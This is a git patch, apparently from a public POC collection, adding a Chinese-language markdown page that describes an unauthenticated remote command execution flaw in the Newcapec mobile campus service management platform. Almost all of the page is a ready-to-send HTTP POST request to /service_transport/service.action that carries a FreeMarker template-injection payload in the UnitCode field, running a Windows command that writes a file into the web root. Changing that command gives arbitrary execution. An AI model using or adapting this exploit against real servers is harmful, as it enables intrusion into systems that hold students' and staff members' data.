From 1689ab3adff880a740b6986b96b31ab4ca4d03e3 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 28 Nov 2023 19:03:51 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=96=B0=E5=BC=80=E6=99=AE=E6=8E=8C?= =?UTF-8?q?=E4=B8=8A=E6=A0=A1=E5=9B=AD=E6=9C=8D=E5=8A=A1=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0service.action=E8=BF=9C=E7=A8=8B=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...校园服务管理平台service.action远程命令执行.md | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 新开普掌上校园服务管理平台service.action远程命令执行.md diff --git a/新开普掌上校园服务管理平台service.action远程命令执行.md b/新开普掌上校园服务管理平台service.action远程命令执行.md new file mode 100644 index 0000000..8118a66 --- /dev/null +++ b/新开普掌上校园服务管理平台service.action远程命令执行.md @@ -0,0 +1,24 @@ + +## 新开普掌上校园服务管理平台service.action远程命令执行 +新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。 + +## POC +``` +POST /service_transport/service.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 +Connection: close +Content-Length: 211 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 +Upgrade-Insecure-Requests: 1 + +{ "command": "GetFZinfo", "UnitCode": "<#assign ex = "freemarker.template.utility.Execute" ?new()>${ex("cmd /c echo 123 >./webapps/ROOT/test.txt")}"} + +``` + +![image](https://github.com/wy876/POC/assets/139549762/1743d6a9-3472-4e9e-ad0e-86b1d5a50dac) +![image](https://github.com/wy876/POC/assets/139549762/67e35c0c-6892-409c-9239-425b79566650) +